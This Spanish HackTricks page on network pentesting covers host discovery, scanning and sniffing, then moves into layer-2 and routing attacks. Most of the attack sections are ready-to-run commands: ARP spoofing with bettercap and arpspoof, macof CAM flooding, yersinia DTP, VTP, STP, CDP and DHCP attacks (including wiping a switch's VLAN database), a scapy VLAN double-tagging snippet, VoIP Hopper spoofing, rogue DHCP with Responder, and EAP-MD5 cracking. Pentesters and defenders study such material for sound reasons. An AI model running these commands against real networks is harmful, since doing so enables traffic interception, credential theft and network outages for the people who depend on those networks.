.. | ||
dhcpv6.md | ||
eigrp-attacks.md | ||
glbp-and-hsrp-attacks.md | ||
ids-evasion.md | ||
lateral-vlan-segmentation-bypass.md | ||
network-protocols-explained-esp.md | ||
nmap-summary-esp.md | ||
pentesting-ipv6.md | ||
README.md | ||
spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md | ||
spoofing-ssdp-and-upnp-devices.md |
Pentesting de Red
Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!
Otras formas de apoyar a HackTricks:
- Si quieres ver a tu empresa anunciada en HackTricks o descargar HackTricks en PDF, consulta los PLANES DE SUSCRIPCIÓN!
- Consigue el merchandising oficial de PEASS & HackTricks
- Descubre La Familia PEASS, nuestra colección de NFTs exclusivos
- Únete al 💬 grupo de Discord o al grupo de telegram o sígueme en Twitter 🐦 @carlospolopm.
- Comparte tus trucos de hacking enviando PRs a los repositorios de github de HackTricks y HackTricks Cloud.
Consejo para bug bounty: regístrate en Intigriti, una plataforma premium de bug bounty creada por hackers, para hackers. Únete a nosotros en https://go.intigriti.com/hacktricks hoy mismo, y comienza a ganar recompensas de hasta $100,000.
{% embed url="https://go.intigriti.com/hacktricks" %}
Descubriendo hosts desde el exterior
Esta va a ser una sección breve sobre cómo encontrar IPs que responden desde Internet.
En esta situación tienes un alcance de IPs (quizás incluso varios rangos) y solo quieres encontrar qué IPs están respondiendo.
ICMP
Esta es la manera más fácil y rápida de descubrir si un host está activo o no.
Podrías intentar enviar algunos paquetes ICMP y esperar respuestas. La forma más sencilla es simplemente enviar una solicitud de eco y esperar por la respuesta. Puedes hacerlo usando un simple ping
o usando fping
para rangos.
También podrías usar nmap para enviar otros tipos de paquetes ICMP (esto evitará filtros a la solicitud-respuesta de eco ICMP común).
ping -c 1 199.66.11.4 # 1 echo request to a host
fping -g 199.66.11.0/24 # Send echo requests to ranges
nmap -PE -PM -PP -sn -n 199.66.11.0/24 #Send echo, timestamp requests and subnet mask requests
Descubrimiento de Puertos TCP
Es muy común encontrar que todo tipo de paquetes ICMP están siendo filtrados. Entonces, todo lo que puedes hacer para verificar si un host está activo es intentar encontrar puertos abiertos. Cada host tiene 65535 puertos, por lo tanto, si tienes un alcance "grande" no puedes probar si cada puerto de cada host está abierto o no, eso tomaría demasiado tiempo.
Entonces, lo que necesitas es un escáner de puertos rápido (masscan) y una lista de los puertos más utilizados:
#Using masscan to scan top20ports of nmap in a /24 range (less than 5min)
masscan -p20,21-23,25,53,80,110,111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 199.66.11.0/24
También podrías realizar este paso con nmap
, pero es más lento y a veces nmap
tiene problemas para identificar hosts activos.
Descubrimiento de Puerto HTTP
Esto es simplemente un descubrimiento de puerto TCP útil cuando quieres centrarte en descubrir servicios HTTP:
masscan -p80,443,8000-8100,8443 199.66.11.0/24
Descubrimiento de Puertos UDP
También podrías intentar verificar si algún puerto UDP está abierto para decidir si deberías prestar más atención a un host. Como los servicios UDP generalmente no responden con ningún dato a un paquete de sondeo UDP vacío, es difícil determinar si un puerto está siendo filtrado o está abierto. La forma más fácil de decidir esto es enviar un paquete relacionado con el servicio en ejecución, y como no sabes qué servicio está activo, deberías intentar con los más probables basándote en el número de puerto:
nmap -sU -sV --version-intensity 0 -F -n 199.66.11.53/24
# The -sV will make nmap test each possible known UDP service packet
# The "--version-intensity 0" will make nmap only test the most probable
La línea de nmap propuesta anteriormente probará los top 1000 puertos UDP en cada host dentro del rango /24, pero incluso solo esto tomará >20min. Si necesitas resultados más rápidos puedes usar udp-proto-scanner: ./udp-proto-scanner.pl 199.66.11.53/24
Esto enviará estas sondas UDP a su puerto esperado (para un rango /24 esto solo tomará 1 min): DNSStatusRequest, DNSVersionBindReq, NBTStat, NTPRequest, RPCCheck, SNMPv3GetRequest, chargen, citrix, daytime, db2, echo, gtpv1, ike, ms-sql, ms-sql-slam, netop, ntp, rpc, snmp-public, systat, tftp, time, xdmcp.
Descubrimiento de Puertos SCTP
#Probably useless, but it's pretty fast, why not trying?
nmap -T4 -sY -n --open -Pn <IP/range>
Pentesting Wifi
Aquí puedes encontrar una buena guía de todos los ataques Wifi conocidos en el momento de la redacción:
{% content-ref url="../pentesting-wifi/" %} pentesting-wifi {% endcontent-ref %}
Descubriendo hosts desde el interior
Si estás dentro de la red, una de las primeras cosas que querrás hacer es descubrir otros hosts. Dependiendo de cuánto ruido puedas/quieras hacer, se podrían realizar diferentes acciones:
Pasivo
Puedes usar estas herramientas para descubrir hosts de manera pasiva dentro de una red conectada:
netdiscover -p
p0f -i eth0 -p -o /tmp/p0f.log
# Bettercap
net.recon on/off #Read local ARP cache periodically
net.show
set net.show.meta true #more info
Activo
Tenga en cuenta que las técnicas comentadas en Descubriendo hosts desde el exterior (Descubrimiento de Puertos TCP/HTTP/UDP/SCTP) también pueden aplicarse aquí.
Pero, como está en la misma red que los otros hosts, puede hacer más cosas:
#ARP discovery
nmap -sn <Network> #ARP Requests (Discover IPs)
netdiscover -r <Network> #ARP requests (Discover IPs)
#NBT discovery
nbtscan -r 192.168.0.1/24 #Search in Domain
# Bettercap
net.probe on/off #Discover hosts on current subnet by probing with ARP, mDNS, NBNS, UPNP, and/or WSD
set net.probe.mdns true/false #Enable mDNS discovery probes (default=true)
set net.probe.nbns true/false #Enable NetBIOS name service discovery probes (default=true)
set net.probe.upnp true/false #Enable UPNP discovery probes (default=true)
set net.probe.wsd true/false #Enable WSD discovery probes (default=true)
set net.probe.throttle 10 #10ms between probes sent (default=10)
#IPv6
alive6 <IFACE> # Send a pingv6 to multicast.
Active ICMP
Tenga en cuenta que las técnicas comentadas en Descubriendo hosts desde el exterior (ICMP) también se pueden aplicar aquí.
Pero, como está en la misma red que los otros hosts, puede hacer más cosas:
- Si hace ping a una dirección de difusión de subred, el ping debería llegar a cada host y ellos podrían responderle:
ping -b 10.10.5.255
- Haciendo ping a la dirección de difusión de red, incluso podría encontrar hosts dentro de otras subredes:
ping -b 255.255.255.255
- Use las banderas
-PE
,-PP
,-PM
denmap
para realizar el descubrimiento de hosts enviando respectivamente eco ICMPv4, solicitudes de timestamp y solicitudes de máscara de subred:nmap -PE -PM -PP -sn -vvv -n 10.12.5.0/24
Wake On Lan
Wake On Lan se utiliza para encender computadoras a través de un mensaje de red. El paquete mágico utilizado para encender la computadora es solo un paquete donde se proporciona un MAC Dst y luego se repite 16 veces dentro del mismo paquete.
Luego, este tipo de paquetes generalmente se envían en un ethernet 0x0842 o en un paquete UDP al puerto 9.
Si no se proporciona [MAC], el paquete se envía a ethernet de difusión (y el MAC de difusión será el que se repita).
# Bettercap (if no [MAC] is specificed ff:ff:ff:ff:ff:ff will be used/entire broadcast domain)
wol.eth [MAC] #Send a WOL as a raw ethernet packet of type 0x0847
wol.udp [MAC] #Send a WOL as an IPv4 broadcast packet to UDP port 9
Escaneo de Hosts
Una vez que hayas descubierto todas las IPs (externas o internas) que deseas escanear en profundidad, se pueden realizar diferentes acciones.
TCP
- Open port: SYN --> SYN/ACK --> RST
- Closed port: SYN --> RST/ACK
- Filtered port: SYN --> [NO RESPONSE]
- Filtered port: SYN --> ICMP message
# Nmap fast scan for the most 1000tcp ports used
nmap -sV -sC -O -T4 -n -Pn -oA fastscan <IP>
# Nmap fast scan for all the ports
nmap -sV -sC -O -T4 -n -Pn -p- -oA fullfastscan <IP>
# Nmap fast scan for all the ports slower to avoid failures due to -T4
nmap -sV -sC -O -p- -n -Pn -oA fullscan <IP>
#Bettercap Scan
syn.scan 192.168.1.0/24 1 10000 #Ports 1-10000
UDP
Hay 2 opciones para escanear un puerto UDP:
- Enviar un paquete UDP y verificar la respuesta ICMP unreachable si el puerto está cerrado (en varios casos ICMP estará filtrado por lo que no recibirás ninguna información si el puerto está cerrado o abierto).
- Enviar datagramas formateados para provocar una respuesta de un servicio (por ejemplo, DNS, DHCP, TFTP y otros, como se lista en nmap-payloads). Si recibes una respuesta, entonces, el puerto está abierto.
Nmap combinará ambas opciones usando "-sV" (los escaneos UDP son muy lentos), pero ten en cuenta que los escaneos UDP son más lentos que los escaneos TCP:
# Check if any of the most common udp services is running
udp-proto-scanner.pl <IP>
# Nmap fast check if any of the 100 most common UDP services is running
nmap -sU -sV --version-intensity 0 -n -F -T4 <IP>
# Nmap check if any of the 100 most common UDP services is running and launch defaults scripts
nmap -sU -sV -sC -n -F -T4 <IP>
# Nmap "fast" top 1000 UDP ports
nmap -sU -sV --version-intensity 0 -n -T4 <IP>
# You could use nmap to test all the UDP ports, but that will take a lot of time
Escaneo SCTP
SCTP se sitúa junto a TCP y UDP. Diseñado para proporcionar el transporte de datos de telefonía sobre IP, el protocolo duplica muchas de las características de fiabilidad de Signaling System 7 (SS7) y sustenta una familia de protocolos más amplia conocida como SIGTRAN. SCTP es compatible con sistemas operativos que incluyen IBM AIX, Oracle Solaris, HP-UX, Linux, Cisco IOS y VxWorks.
nmap ofrece dos tipos diferentes de escaneos para SCTP: -sY y -sZ
# Nmap fast SCTP scan
nmap -T4 -sY -n -oA SCTFastScan <IP>
# Nmap all SCTP scan
nmap -T4 -p- -sY -sV -sC -F -n -oA SCTAllScan <IP>
Evasión de IDS e IPS
{% content-ref url="ids-evasion.md" %} ids-evasion.md {% endcontent-ref %}
Más opciones de nmap
{% content-ref url="nmap-summary-esp.md" %} nmap-summary-esp.md {% endcontent-ref %}
Revelando direcciones IP internas
Routers, firewalls y dispositivos de red mal configurados a veces responden a sondas de red usando direcciones de origen no públicas. Puedes usar tcpdump para identificar paquetes recibidos desde direcciones privadas durante las pruebas. En este caso, la interfaz eth2 en Kali Linux es direccionable desde el Internet público (Si estás detrás de un NAT o un Firewall, este tipo de paquetes probablemente van a ser filtrados).
tcpdump –nt -i eth2 src net 10 or 172.16/12 or 192.168/16
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth2, link-type EN10MB (Ethernet), capture size 65535 bytes
IP 10.10.0.1 > 185.22.224.18: ICMP echo reply, id 25804, seq 1582, length 64
IP 10.10.0.2 > 185.22.224.18: ICMP echo reply, id 25804, seq 1586, length 64
Sniffing
El sniffing permite aprender detalles de rangos IP, tamaños de subred, direcciones MAC y nombres de host al revisar tramas y paquetes capturados. Si la red está mal configurada o la infraestructura de conmutación está bajo estrés, los atacantes pueden capturar material sensible mediante sniffing pasivo de la red.
Si una red Ethernet conmutada está configurada correctamente, solo verás tramas de difusión y material destinado a tu dirección MAC.
TCPDump
sudo tcpdump -i <INTERFACE> udp port 53 #Listen to DNS request to discover what is searching the host
tcpdump -i <IFACE> icmp #Listen to icmp packets
sudo bash -c "sudo nohup tcpdump -i eth0 -G 300 -w \"/tmp/dump-%m-%d-%H-%M-%S-%s.pcap\" -W 50 'tcp and (port 80 or port 443)' &"
Uno también puede capturar paquetes de una máquina remota a través de una sesión SSH con Wireshark como la interfaz gráfica en tiempo real.
ssh user@<TARGET IP> tcpdump -i ens160 -U -s0 -w - | sudo wireshark -k -i -
ssh <USERNAME>@<TARGET IP> tcpdump -i <INTERFACE> -U -s0 -w - 'port not 22' | sudo wireshark -k -i - # Exclude SSH traffic
Bettercap
net.sniff on
net.sniff stats
set net.sniff.output sniffed.pcap #Write captured packets to file
set net.sniff.local #If true it will consider packets from/to this computer, otherwise it will skip them (default=false)
set net.sniff.filter #BPF filter for the sniffer (default=not arp)
set net.sniff.regexp #If set only packets matching this regex will be considered
Wireshark
Obviamente.
Captura de credenciales
Puedes usar herramientas como https://github.com/lgandx/PCredz para analizar credenciales de un pcap o una interfaz en vivo.
Ataques en LAN
ARP spoofing
ARP Spoofing consiste en enviar ARPResponses gratuitos para indicar que la IP de una máquina tiene la MAC de nuestro dispositivo. Entonces, la víctima cambiará la tabla ARP y contactará nuestra máquina cada vez que quiera contactar la IP suplantada.
Bettercap
arp.spoof on
set arp.spoof.targets <IP> #Specific targets to ARP spoof (default=<entire subnet>)
set arp.spoof.whitelist #Specific targets to skip while spoofing
set arp.spoof.fullduplex true #If true, both the targets and the gateway will be attacked, otherwise only the target (default=false)
set arp.spoof.internal true #If true, local connections among computers of the network will be spoofed, otherwise only connections going to and coming from the Internet (default=false)
Arpspoof
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -t 192.168.1.1 192.168.1.2
arpspoof -t 192.168.1.2 192.168.1.1
Desbordamiento de MAC - CAM overflow
Desborda la tabla CAM del switch enviando muchos paquetes con diferentes direcciones MAC de origen. Cuando la tabla CAM está llena, el switch comienza a comportarse como un hub (transmitiendo todo el tráfico en modo broadcast).
macof -i <interface>
En switches modernos, esta vulnerabilidad ha sido corregida.
Ataques 802.1Q VLAN / DTP
Troncal Dinámico
DTP (Dynamic Trunking Protocol) es un protocolo de capa de enlace diseñado para proporcionar un sistema de troncalización automático. Con DTP, los switches deciden qué puerto funcionará en modo troncal (Trunk) y cuál no. El uso de DTP indica diseño de red deficiente. Los troncales deben ser estrictamente donde se necesiten y deben estar documentados.
Por defecto, todos los puertos de switch operan en modo Dynamic Auto. Esto indica que el puerto del switch está en modo de iniciación de troncal desde el switch vecino. El Pentester necesita conectarse físicamente al switch y enviar un frame DTP Desirable, lo que desencadena que el puerto cambie a modo troncal. El atacante puede entonces enumerar VLANs usando análisis de frames STP y evadir la segmentación de VLAN creando interfaces virtuales.
Muchos switches soportan el Protocolo de Troncalización Dinámica (DTP) por defecto, sin embargo, lo cual un adversario puede abusar para emular un switch y recibir tráfico a través de todas las VLANs. La herramienta dtpscan.sh puede olfatear una interfaz e informa si el switch está en modo Default, troncal, dinámico, auto o modo de acceso (este último es el único que evitaría el salto de VLAN). La herramienta indicará si el switch es vulnerable o no.
Si se descubre que la red es vulnerable, puedes usar Yersinia para lanzar un "enable trunking" usando el protocolo "DTP" y podrás ver paquetes de red de todas las VLANs.
apt-get install yersinia #Installation
sudo apt install kali-linux-large #Another way to install it in Kali
yersinia -I #Interactive mode
#In interactive mode you will need to select a interface first
#Then, you can select the protocol to attack using letter "g"
#Finally, you can select the attack using letter "x"
yersinia -G #For graphic mode
![](<../../.gitbook/assets/image (646) (1).png>)
Para enumerar las VLANs también es posible generar el frame DTP Desirable con el script [**DTPHijacking.py**](https://github.com/in9uz/VLANPWN/blob/main/DTPHijacking.py). No interrumpas el script bajo ninguna circunstancia. Inyecta DTP Desirable cada tres segundos. **Los canales de troncal creados dinámicamente en el switch solo viven durante cinco minutos. Después de cinco minutos, el troncal se desconecta.**
sudo python3 DTPHijacking.py --interface eth0
Quisiera señalar que Access/Desirable (0x03) indica que el frame DTP es del tipo Deseable, lo que le dice al puerto que cambie al modo Trunk. Y 802.1Q/802.1Q (0xa5) indica el tipo de encapsulación 802.1Q.
Al analizar los frames STP, aprendemos sobre la existencia de VLAN 30 y VLAN 60.
Atacando VLANs específicas
Una vez que conoces los IDs de VLAN y los valores de IPs, puedes configurar una interfaz virtual para atacar una VLAN específica.
Si DHCP no está disponible, entonces usa ifconfig para establecer una dirección IP estática.
root@kali:~# modprobe 8021q
root@kali:~# vconfig add eth1 250
Added VLAN with VID == 250 to IF -:eth1:-
root@kali:~# dhclient eth1.250
Reloading /etc/samba/smb.conf: smbd only.
root@kali:~# ifconfig eth1.250
eth1.250 Link encap:Ethernet HWaddr 00:0e:c6:f0:29:65
inet addr:10.121.5.86 Bcast:10.121.5.255 Mask:255.255.255.0
inet6 addr: fe80::20e:c6ff:fef0:2965/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:19 errors:0 dropped:0 overruns:0 frame:0
TX packets:13 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:2206 (2.1 KiB) TX bytes:1654 (1.6 KiB)
root@kali:~# arp-scan -I eth1.250 10.121.5.0/24
# Another configuration example
modprobe 8021q
vconfig add eth1 20
ifconfig eth1.20 192.168.1.2 netmask 255.255.255.0 up
# Another configuration example
sudo vconfig add eth0 30
sudo ip link set eth0.30 up
sudo dhclient -v eth0.30
Saltador Automático de VLAN
El ataque discutido de Dynamic Trunking y creación de interfaces virtuales y descubrimiento de hosts dentro de otras VLANs se realiza automáticamente con la herramienta: https://github.com/nccgroup/vlan-hopping---frogger
Doble Etiquetado
Si un atacante conoce el valor del MAC, IP y VLAN ID del host víctima, podría intentar doblemente etiquetar un marco con su VLAN designada y la VLAN de la víctima y enviar un paquete. Como la víctima no podrá conectarse de vuelta con el atacante, la mejor opción para el atacante es comunicarse vía UDP con protocolos que pueden realizar algunas acciones interesantes (como SNMP).
Otra opción para el atacante es lanzar un escaneo de puertos TCP suplantando una IP controlada por el atacante y accesible por la víctima (probablemente a través de internet). Entonces, el atacante podría capturar en el segundo host de su propiedad si recibe algunos paquetes de la víctima.
Para realizar este ataque puedes usar scapy: pip install scapy
from scapy.all import *
# Double tagging with ICMP packet (the response from the victim isn't double tagged so it will never reach the attacker)
packet = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=20)/IP(dst='192.168.1.10')/ICMP()
sendp(packet)
Elusión de Segmentación Lateral de VLAN
Si tienes acceso a un switch al que estás directamente conectado, tienes la capacidad de eludir la segmentación de VLAN dentro de la red. Simplemente cambia el puerto a modo troncal (conocido también como trunk), crea interfaces virtuales con los IDs de las VLANs objetivo y configura una dirección IP. Puedes intentar solicitar la dirección de forma dinámica (DHCP) o puedes configurarla de manera estática. Depende del caso.
{% content-ref url="lateral-vlan-segmentation-bypass.md" %} lateral-vlan-segmentation-bypass.md {% endcontent-ref %}
Elusión de VLAN Privada de Capa 3
En redes inalámbricas para invitados y otros entornos, se utilizan configuraciones de VLAN privada (también conocida como aislamiento de puerto) para evitar la interacción entre pares (es decir, los clientes se conectan a un punto de acceso inalámbrico pero no pueden comunicarse entre sí). Dependiendo de las ACLs de red (o su ausencia), podría ser posible enviar paquetes IP hasta un router, que luego los reenvía a un par vecino.
Este ataque enviará un paquete especialmente diseñado a la IP de un cliente pero con la MAC del router. Entonces, el router redirigirá el paquete al cliente. Como en los Ataques de Doble Etiquetado, puedes explotar esta vulnerabilidad controlando un host al que la víctima tiene acceso.
Ataques VTP
VTP (Protocolo de Troncalización de VLAN) es un protocolo diseñado para gestionar centralmente las VLANs. Para llevar un registro de la base de datos de VLAN actual, los switches verifican números de revisión especiales. Cuando ocurre alguna actualización de la tabla, el número de revisión se incrementa en uno. Y si un switch detecta una configuración con un número de revisión más alto, actualizará automáticamente su base de datos de VLAN.
Roles en un dominio VTP
- Servidor VTP. Un switch en el rol de Servidor VTP puede crear nuevas VLANs, eliminar las antiguas o cambiar la información en las VLANs mismas. También genera anuncios VTP para el resto de los miembros del dominio.
- Cliente VTP. Un switch en este rol recibirá anuncios VTP específicos de otros switches en el dominio para actualizar las bases de datos de VLAN por su cuenta. Los clientes tienen una capacidad limitada para crear VLANs y ni siquiera se les permite cambiar la configuración de VLAN localmente. En otras palabras, acceso de solo lectura.
- VTP Transparente. En este modo, el switch no participa en los procesos VTP y puede administrar completamente y de forma local toda la configuración de VLAN. Cuando operan en modo transparente, los switches solo transmiten anuncios VTP de otros switches sin afectar su configuración de VLAN. Estos switches siempre tendrán un número de revisión de cero y no pueden ser atacados.
Tipos de anuncios
- Anuncio Resumen — el anuncio VTP que el servidor VTP envía cada 300 segundos (5 minutos). Este anuncio almacena el nombre del dominio VTP, versión del protocolo, marca de tiempo y valor hash de la configuración MD5.
- Anuncio Subconjunto — este es el anuncio VTP que se envía cada vez que ocurre un cambio en la configuración de VLAN.
- Solicitud de Anuncio — es una solicitud del cliente VTP al servidor VTP para un mensaje de Anuncio Resumen. Generalmente se envía en respuesta a un mensaje que un switch ha detectado un Anuncio Resumen con un número de revisión de configuración más alto.
VTP solo puede ser atacado desde un puerto troncal, porque los anuncios VTP solo se emiten y reciben en puertos troncales. Por lo tanto, cuando haces pentesting después de atacar DTP, tu próximo objetivo podría ser VTP. Para atacar el dominio VTP puedes usar Yersinia para ejecutar una inyección VTP que borrará toda la base de datos de VLAN y así paralizar la red.
{% hint style="info" %} El protocolo VTP tiene hasta tres versiones. En este post el ataque es contra la primera versión, VTPv1 {% endhint %}
yersinia -G #For graphic mode
Para borrar la base de datos completa de VLAN, selecciona la opción deleting all VTP vlans
Ataques STP
Si no puedes capturar tramas BPDU en tus interfaces, es poco probable que tengas éxito en un ataque STP.
STP BPDU DoS
Enviar una gran cantidad de BPDUs TCP (Notificación de Cambio de Topología) o Conf (los BPDUs que se envían cuando se crea la topología) sobrecarga los switches y deja de funcionar correctamente.
yersinia stp -attack 2
yersinia stp -attack 3
#Use -M to disable MAC spoofing
Ataque STP TCP
Cuando se envía un TCP, la tabla CAM de los switches se eliminará en 15s. Entonces, si continuas enviando este tipo de paquetes, la tabla CAM se reiniciará continuamente (o cada 15 segundos) y cuando se reinicie, el switch se comportará como un hub.
yersinia stp -attack 1 #Will send 1 TCP packet and the switch should restore the CAM in 15 seconds
yersinia stp -attack 0 #Will send 1 CONF packet, nothing else will happen
Ataque STP Root
El atacante simula el comportamiento de un switch para convertirse en la raíz STP de la red. Entonces, más datos pasarán a través de él. Esto es interesante cuando estás conectado a dos switches diferentes.
Esto se logra enviando paquetes BPDUs CONF indicando que el valor de prioridad es menor que la prioridad actual del switch raíz actual.
yersinia stp -attack 4 #Behaves like the root switch
yersinia stp -attack 5 #This will make the device behaves as a switch but will not be root
Si el atacante está conectado a 2 switches, puede ser la raíz del nuevo árbol y todo el tráfico entre esos switches pasará por él (se realizará un ataque MITM).
yersinia stp -attack 6 #This will cause a DoS as the layer 2 packets wont be forwarded. You can use Ettercap to forward those packets "Sniff" --> "Bridged sniffing"
ettercap -T -i eth1 -B eth2 -q #Set a bridge between 2 interfaces to forwardpackages
Ataques CDP
El Protocolo de Descubrimiento de CISCO es el protocolo utilizado por los dispositivos CISCO para comunicarse entre ellos, descubrir quién está activo y qué características tienen.
Recopilación de Información
Por defecto, el CDP envía anuncios a todos sus puertos. Pero, ¿qué pasa si un intruso se conecta a un puerto en el mismo switch? Utilizando un analizador de red, ya sea Wireshark, tcpdump o Yersinia, podría extraer información valiosa sobre el propio dispositivo, desde su modelo hasta la versión de Cisco IOS. Utilizando esta información, podrá enumerar la misma versión de Cisco IOS y encontrar la vulnerabilidad para luego explotarla.
Ataque de Inundación CDP
Puedes realizar un ataque DoS a un switch CISCO agotando la memoria del dispositivo simulando dispositivos CISCO reales.
sudo yersinia cdp -attack 1 #DoS Attack simulating new CISCO devices
# Or you could use the GUI
sudo yersinia -G
Seleccione la opción flooding CDP table y comience el ataque. La CPU del switch se sobrecargará, así como la tabla de vecinos CDP, resultando en "parálisis de red".
Ataque de Suplantación de CDP
sudo yersinia cdp -attack 2 #Simulate a new CISCO device
sudo yersinia cdp -attack 0 #Send a CDP packet
También puedes usar scapy. Asegúrate de instalarlo con el paquete scapy/contrib
.
Ataques VoIP
Aunque están pensados para ser utilizados por los teléfonos de Protocolo de Voz sobre Internet (VoIP) de los empleados, los dispositivos VoIP modernos están cada vez más integrados con dispositivos IoT. Muchos empleados ahora pueden desbloquear puertas utilizando un número de teléfono especial, controlar el termostato de la habitación...
La herramienta voiphopper imita el comportamiento de un teléfono VoIP en entornos de Cisco, Avaya, Nortel y Alcatel-Lucent. Descubre automáticamente el ID de VLAN correcto para la red de voz utilizando uno de los protocolos de descubrimiento de dispositivos que admite, como el Protocolo de Descubrimiento de Cisco (CDP), el Protocolo de Configuración Dinámica de Host (DHCP), el Protocolo de Descubrimiento de Capa de Enlace Media Endpoint Discovery (LLDP-MED) y ARP 802.1Q.
VoIP Hopper soporta tres modos CDP. El modo sniff inspecciona los paquetes de red e intenta localizar el ID de VLAN. Para usarlo, establece el parámetro -c
en 0
. El modo spoof genera paquetes personalizados similares a los que un dispositivo VoIP real transmitiría en la red corporativa. Para usarlo, establece el parámetro -c
en 1
. El modo de spoof con un paquete pre-hecho envía los mismos paquetes que un teléfono IP Cisco 7971G-GE. Para usarlo, establece el parámetro -c
en 2
.
Usamos el último método porque es el enfoque más rápido. El parámetro -i
especifica la interfaz de red del atacante, y el parámetro -E
especifica el nombre del dispositivo VOIP que se está imitando. Elegimos el nombre SEP001EEEEEEEEE, que es compatible con el formato de nomenclatura de Cisco para teléfonos VoIP. El formato consiste en la palabra "SEP" seguida de una dirección MAC. En entornos corporativos, puedes imitar un dispositivo VoIP existente mirando la etiqueta MAC en la parte trasera del teléfono; presionando el botón de Configuración y seleccionando la opción de Información del Modelo en la pantalla del teléfono; o conectando el cable Ethernet del dispositivo VoIP a tu laptop y observando las solicitudes CDP del dispositivo utilizando Wireshark.
voiphopper -i eth1 -E 'SEP001EEEEEEEEE ' -c 2
Si la herramienta se ejecuta con éxito, la red VLAN asignará una dirección IPv4 al dispositivo del atacante.
Ataques DHCP
Enumeración
nmap --script broadcast-dhcp-discover
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-16 05:30 EDT
WARNING: No targets were specified, so 0 hosts scanned.
Pre-scan script results:
| broadcast-dhcp-discover:
| Response 1 of 1:
| IP Offered: 192.168.1.250
| DHCP Message Type: DHCPOFFER
| Server Identifier: 192.168.1.1
| IP Address Lease Time: 1m00s
| Subnet Mask: 255.255.255.0
| Router: 192.168.1.1
| Domain Name Server: 192.168.1.1
|_ Domain Name: mynet
Nmap done: 0 IP addresses (0 hosts up) scanned in 5.27 seconds
DoS
Dos tipos de DoS podrían realizarse contra servidores DHCP. El primero consiste en simular suficientes hosts falsos para usar todas las direcciones IP posibles.
Este ataque solo funcionará si puedes ver las respuestas del servidor DHCP y completar el protocolo (Discover (Comp) --> Offer (servidor) --> Request (Comp) --> ACK (servidor)). Por ejemplo, esto no es posible en redes Wifi.
Otra forma de realizar un DoS DHCP es enviar un paquete DHCP-RELEASE utilizando como código fuente todas las IP posibles. Entonces, el servidor pensará que todos han terminado de usar la IP.
yersinia dhcp -attack 1
yersinia dhcp -attack 3 #More parameters are needed
Una forma más automática de hacer esto es utilizando la herramienta DHCPing
Podrías usar los ataques DoS mencionados para forzar a los clientes a obtener nuevas concesiones dentro del entorno y agotar los servidores legítimos para que se vuelvan irresponsivos. Entonces, cuando los legítimos intenten reconectarse, puedes servir valores maliciosos mencionados en el siguiente ataque.
Establecer valores maliciosos
Puedes usar el script DHCP de Responder (/usr/share/responder/DHCP.py) para establecer un servidor DHCP falso. Establecer una puerta de enlace maliciosa no es ideal, porque la conexión secuestrada es solo half-duplex (es decir, capturamos paquetes de salida del cliente, pero no las respuestas de la puerta de enlace legítima). Como tal, recomendaría establecer un servidor DNS o WPAD falso para capturar tráfico HTTP y credenciales en particular.
Descripción | Ejemplo |
---|---|
Nuestra dirección IP, anunciada como gateway | -i 10.0.0.100 |
El nombre de dominio DNS local (opcional) | -d example.org |
Dirección IP del router/gateway original | -r 10.0.0.1 |
Dirección IP del servidor DNS primario | -p 10.0.0.100 |
Dirección IP del servidor DNS secundario (opcional) | -s 10.0.0.1 |
La máscara de red de la red local | -n 255.255.255.0 |
La interfaz para escuchar tráfico DHCP | -I eth1 |
Dirección de configuración WPAD (URL) | -w “http://10.0.0.100/wpad.dat\n” |
Suplantar la dirección IP de la puerta de enlace predeterminada | -S |
Responder a todas las solicitudes DHCP (muy ruidoso) | -R |
Ataques EAP
Aquí hay algunas de las tácticas de ataque que se pueden usar contra implementaciones 802.1X:
- Fuerza bruta activa de contraseñas a través de EAP
- Atacar el servidor RADIUS con contenido EAP malformado **(exploits)
- Captura de mensajes EAP y cracking de contraseñas offline (EAP-MD5 y PEAP)
- Forzar la autenticación EAP-MD5 para eludir la validación del certificado TLS
- Inyectar tráfico de red malicioso tras autenticarse usando un hub o similar
Si el atacante está entre la víctima y el servidor de autenticación, podría intentar degradar (si es necesario) el protocolo de autenticación a EAP-MD5 y capturar el intento de autenticación. Luego, podría forzar bruta usando:
eapmd5pass –r pcap.dump –w /usr/share/wordlist/sqlmap.txt
Ataques FHRP (GLBP & HSRP)
FHRP (Protocolo de Redundancia del Primer Salto) es una clase de protocolos de red diseñados para crear un sistema de enrutamiento redundante activo. Con FHRP, los routers físicos pueden combinarse en un único dispositivo lógico, lo que aumenta la tolerancia a fallos y ayuda a distribuir la carga.
Ingenieros de Cisco Systems han desarrollado dos protocolos FHRP, GLBP y HSRP.
{% content-ref url="glbp-and-hsrp-attacks.md" %} glbp-and-hsrp-attacks.md {% endcontent-ref %}
RIP
Existen tres versiones del Protocolo de Información de Enrutamiento (RIP)—RIP, RIPv2 y RIPng. RIP y RIPv2 utilizan datagramas UDP enviados a pares a través del puerto 520, mientras que RIPng transmite datagramas a puerto UDP 521 a través de multicast IPv6. RIPv2 introdujo soporte de autenticación MD5. RIPng no incorpora autenticación nativa; en cambio, depende de las cabeceras opcionales IPsec AH y ESP dentro de IPv6.
Para más información sobre cómo atacar este protocolo, consulta el libro Network Security Assessment: Know Your Network (3rd edition).
Ataques EIGRP
EIGRP (Protocolo de Enrutamiento Interior Mejorado) es un protocolo de enrutamiento dinámico. Es un protocolo vector-distancia. Si no hay autenticación y configuración de interfaces pasivas, un intruso puede interferir con el enrutamiento EIGRP y causar envenenamiento de tablas de enrutamiento. Además, la red EIGRP (en otras palabras, sistema autónomo) es plana y no tiene segmentación en zonas. Si un atacante inyecta una ruta, es probable que esta ruta se propague a través del sistema autónomo EIGRP.
Atacar un sistema EIGRP requiere establecer una vecindad con un enrutador EIGRP legítimo, lo que abre muchas posibilidades, desde reconocimiento básico hasta diversas inyecciones.
****FRRouting te permite implementar un enrutador virtual que soporta BGP, OSPF, EIGRP, RIP y otros protocolos. Todo lo que necesitas hacer es desplegarlo en el sistema del atacante y puedes pretender ser un enrutador legítimo en el dominio de enrutamiento.
{% content-ref url="eigrp-attacks.md" %} eigrp-attacks.md {% endcontent-ref %}
